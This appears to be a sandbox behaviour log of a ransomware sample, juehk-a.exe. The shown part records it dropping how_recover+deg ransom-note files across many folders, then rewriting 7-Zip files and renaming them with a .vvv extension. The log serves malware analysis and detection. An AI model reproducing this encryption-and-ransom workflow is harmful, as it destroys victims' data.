- value: C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\Access.en-us\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521080
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 53807
- mode: close
- sequenceNumber: 695
- value: C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\Access.en-us\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521080
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 53814
- mode: created
- sequenceNumber: 696
- value: C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521081
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 53822
- mode: close
- sequenceNumber: 697
- value: C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521081
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 53829
- mode: created
- sequenceNumber: 698
- value: C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521082
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 53835
- mode: close
- sequenceNumber: 699
- value: C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521082
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 53866
- mode: created
- sequenceNumber: 700
- value: C:\MSOCache\All Users\{90150000-012B-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521083
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 53873
- mode: close
- sequenceNumber: 701
- value: C:\MSOCache\All Users\{90150000-012B-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521083
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 53878
- mode: created
- sequenceNumber: 702
- value: C:\MSOCache\All Users\{90150000-012B-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521084
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 53884
- mode: close
- sequenceNumber: 703
- value: C:\MSOCache\All Users\{90150000-012B-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521084
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 53892
- mode: created
- sequenceNumber: 704
- value: C:\MSOCache\All Users\{91150000-0011-0000-1000-0000000FF1CE}-C\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521085
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 53899
- mode: close
- sequenceNumber: 705
- value: C:\MSOCache\All Users\{91150000-0011-0000-1000-0000000FF1CE}-C\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521085
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 53906
- mode: created
- sequenceNumber: 706
- value: C:\MSOCache\All Users\{91150000-0011-0000-1000-0000000FF1CE}-C\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521086
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 53912
- mode: close
- sequenceNumber: 707
- value: C:\MSOCache\All Users\{91150000-0011-0000-1000-0000000FF1CE}-C\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521086
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 53917
- mode: created
- sequenceNumber: 708
- value: C:\MSOCache\All Users\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521087
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 53922
- mode: close
- sequenceNumber: 709
- value: C:\MSOCache\All Users\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521087
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 53928
- mode: created
- sequenceNumber: 710
- value: C:\MSOCache\All Users\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521088
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 53933
- mode: close
- sequenceNumber: 711
- value: C:\MSOCache\All Users\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521088
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 53938
- mode: created
- sequenceNumber: 712
- value: C:\MSOCache\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231745
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 53942
- mode: close
- sequenceNumber: 713
- value: C:\MSOCache\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231745
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 54018
- mode: created
- sequenceNumber: 714
- value: C:\MSOCache\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231746
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 54022
- mode: close
- sequenceNumber: 715
- value: C:\MSOCache\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231746
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 54090
- mode: created
- sequenceNumber: 716
- value: C:\PerfLogs\Admin\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521091
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 54094
- mode: close
- sequenceNumber: 717
- value: C:\PerfLogs\Admin\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521091
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 54134
- mode: created
- sequenceNumber: 718
- value: C:\PerfLogs\Admin\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521092
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 54139
- mode: close
- sequenceNumber: 719
- value: C:\PerfLogs\Admin\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521092
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 54148
- mode: created
- sequenceNumber: 720
- value: C:\PerfLogs\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521093
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 54155
- mode: close
- sequenceNumber: 721
- value: C:\PerfLogs\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521093
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 54160
- mode: created
- sequenceNumber: 722
- value: C:\PerfLogs\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521094
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 54164
- mode: close
- sequenceNumber: 723
- value: C:\PerfLogs\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521094
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 54169
- mode: created
- sequenceNumber: 724
- value: C:\Program Files\699jsSFHhCS\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521095
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 54174
- mode: close
- sequenceNumber: 725
- value: C:\Program Files\699jsSFHhCS\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521095
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 54441
- mode: created
- sequenceNumber: 726
- value: C:\Program Files\699jsSFHhCS\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521096
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 54446
- mode: close
- sequenceNumber: 727
- value: C:\Program Files\699jsSFHhCS\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521096
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 54787
- mode: open
- sequenceNumber: 728
- value: C:\Program Files\7-Zip\History.txt
- filesize: 32400
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519710
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 55796
- mode: close
- sequenceNumber: 729
- value: C:\Program Files\7-Zip\History.txt
- filesize: 32830
- md5sum: 33401c175a2d6e0bd6227620e2f31de5
- sha1sum: 7d87ab9105fe113563569dbbaf96eb70c438c013
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519710
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 55855
- mode: rename
- sequenceNumber: 730
- filesize: 32830
- md5sum: 33401c175a2d6e0bd6227620e2f31de5
- sha1sum: 7d87ab9105fe113563569dbbaf96eb70c438c013
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\History.txt
- new_name: C:\Program Files\7-Zip\History.txt.vvv
- ads:
- fid (ads:): 562949953519710
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 56245
- mode: open
- sequenceNumber: 731
- value: C:\Program Files\7-Zip\Lang\af.txt
- filesize: 10348
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519716
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 57438
- mode: close
- sequenceNumber: 732
- value: C:\Program Files\7-Zip\Lang\af.txt
- filesize: 10766
- md5sum: 38b27ac57187325245db40010ef06c51
- sha1sum: 353460c7a85ff8aaf39b1fe54f24167f364fed3d
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519716
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 57527
- mode: rename
- sequenceNumber: 733
- filesize: 10766
- md5sum: 38b27ac57187325245db40010ef06c51
- sha1sum: 353460c7a85ff8aaf39b1fe54f24167f364fed3d
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\af.txt
- new_name: C:\Program Files\7-Zip\Lang\af.txt.vvv
- ads:
- fid (ads:): 562949953519716
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 57796
- mode: open
- sequenceNumber: 734
- value: C:\Program Files\7-Zip\Lang\ar.txt
- filesize: 16900
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519717
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 58143
- mode: close
- sequenceNumber: 735
- value: C:\Program Files\7-Zip\Lang\ar.txt
- filesize: 17326
- md5sum: 5a3edd99921fa615510a4b98c592c73a
- sha1sum: 64483fb9b1796e455a58db2d123c6fb5c601a214
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519717
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 58171
- mode: rename
- sequenceNumber: 736
- filesize: 17326
- md5sum: 5a3edd99921fa615510a4b98c592c73a
- sha1sum: 64483fb9b1796e455a58db2d123c6fb5c601a214
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\ar.txt
- new_name: C:\Program Files\7-Zip\Lang\ar.txt.vvv
- ads:
- fid (ads:): 562949953519717
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 58196
- mode: open
- sequenceNumber: 737
- value: C:\Program Files\7-Zip\Lang\ast.txt
- filesize: 10640
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519718
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 58459
- mode: close
- sequenceNumber: 738
- value: C:\Program Files\7-Zip\Lang\ast.txt
- filesize: 11070
- md5sum: 06309f3541a3ee3a021aeb72902b9837
- sha1sum: 428374af180b895eec50b0de2f1ed59855449844
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519718
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 58485
- mode: rename
- sequenceNumber: 739
- filesize: 11070
- md5sum: 06309f3541a3ee3a021aeb72902b9837
- sha1sum: 428374af180b895eec50b0de2f1ed59855449844
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\ast.txt
- new_name: C:\Program Files\7-Zip\Lang\ast.txt.vvv
- ads:
- fid (ads:): 562949953519718
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 58501
- mode: open
- sequenceNumber: 740
- value: C:\Program Files\7-Zip\Lang\az.txt
- filesize: 13824
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519719
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 58685
- mode: close
- sequenceNumber: 741
- value: C:\Program Files\7-Zip\Lang\az.txt
- filesize: 14254
- md5sum: bc4abd6f12dd4f91f66270a3c6240add
- sha1sum: ba33e393b1c771885a90263b7f47f73afe17822b
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519719
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 58694
- mode: rename
- sequenceNumber: 742
- filesize: 14254
- md5sum: bc4abd6f12dd4f91f66270a3c6240add
- sha1sum: ba33e393b1c771885a90263b7f47f73afe17822b
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\az.txt
- new_name: C:\Program Files\7-Zip\Lang\az.txt.vvv
- ads:
- fid (ads:): 562949953519719
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 58713
- mode: open
- sequenceNumber: 743
- value: C:\Program Files\7-Zip\Lang\ba.txt
- filesize: 18160
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519720
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 58794
- mode: close
- sequenceNumber: 744
- value: C:\Program Files\7-Zip\Lang\ba.txt
- filesize: 18590
- md5sum: a6e705689486f71879493261a4c18ae9
- sha1sum: e39da4890b31bfe32be51bf30c86877c68d25fa9
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519720
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 58801
- mode: rename
- sequenceNumber: 745
- filesize: 18590
- md5sum: a6e705689486f71879493261a4c18ae9
- sha1sum: e39da4890b31bfe32be51bf30c86877c68d25fa9
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\ba.txt
- new_name: C:\Program Files\7-Zip\Lang\ba.txt.vvv
- ads:
- fid (ads:): 562949953519720
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 58807
- mode: open
- sequenceNumber: 746
- value: C:\Program Files\7-Zip\Lang\be.txt
- filesize: 18850
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519721
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 58844
- mode: close
- sequenceNumber: 747
- value: C:\Program Files\7-Zip\Lang\be.txt
- filesize: 19278
- md5sum: d2c99b0b25098f91c29fd7ea5619736a
- sha1sum: 02041064bbf124fbc38a69ac521c363a40993ffd
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519721
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 58851
- mode: rename
- sequenceNumber: 748
- filesize: 19278
- md5sum: d2c99b0b25098f91c29fd7ea5619736a
- sha1sum: 02041064bbf124fbc38a69ac521c363a40993ffd
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\be.txt
- new_name: C:\Program Files\7-Zip\Lang\be.txt.vvv
- ads:
- fid (ads:): 562949953519721
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 58859
- mode: open
- sequenceNumber: 749
- value: C:\Program Files\7-Zip\Lang\bg.txt
- filesize: 20580
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519722
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 58925
- mode: close
- sequenceNumber: 750
- value: C:\Program Files\7-Zip\Lang\bg.txt
- filesize: 21006
- md5sum: 4477fb1aa5ed372d9502a7d151ce5c55
- sha1sum: f249336bf6cbe24f4948157e9d921e91d8ab1327
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519722
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 58932
- mode: rename
- sequenceNumber: 751
- filesize: 21006
- md5sum: 4477fb1aa5ed372d9502a7d151ce5c55
- sha1sum: f249336bf6cbe24f4948157e9d921e91d8ab1327
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\bg.txt
- new_name: C:\Program Files\7-Zip\Lang\bg.txt.vvv
- ads:
- fid (ads:): 562949953519722
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 58937
- mode: open
- sequenceNumber: 752
- value: C:\Program Files\7-Zip\Lang\bn.txt
- filesize: 23005
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519723
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 58979
- mode: close
- sequenceNumber: 753
- value: C:\Program Files\7-Zip\Lang\bn.txt
- filesize: 23422
- md5sum: e402952f91719c7f5dc31e4ce646227f
- sha1sum: 9c52121bb454f86bc91eeb3f90bf35cb937cf381
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519723
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 58991
- mode: rename
- sequenceNumber: 754
- filesize: 23422
- md5sum: e402952f91719c7f5dc31e4ce646227f
- sha1sum: 9c52121bb454f86bc91eeb3f90bf35cb937cf381
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\bn.txt
- new_name: C:\Program Files\7-Zip\Lang\bn.txt.vvv
- ads:
- fid (ads:): 562949953519723
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 59330
- mode: open
- sequenceNumber: 755
- value: C:\Program Files\7-Zip\Lang\br.txt
- filesize: 10645
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519724
- ntstatus: 0x0
- CreateOptions: 0x60
- apicall:
- timestamp: 59423
- repeat: 200
- sequenceNumber: 756
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 60028
- mode: close
- sequenceNumber: 757
- value: C:\Program Files\7-Zip\Lang\br.txt
- filesize: 11070
- md5sum: 9455d2c83b2e185ad45eb531e9532bb6
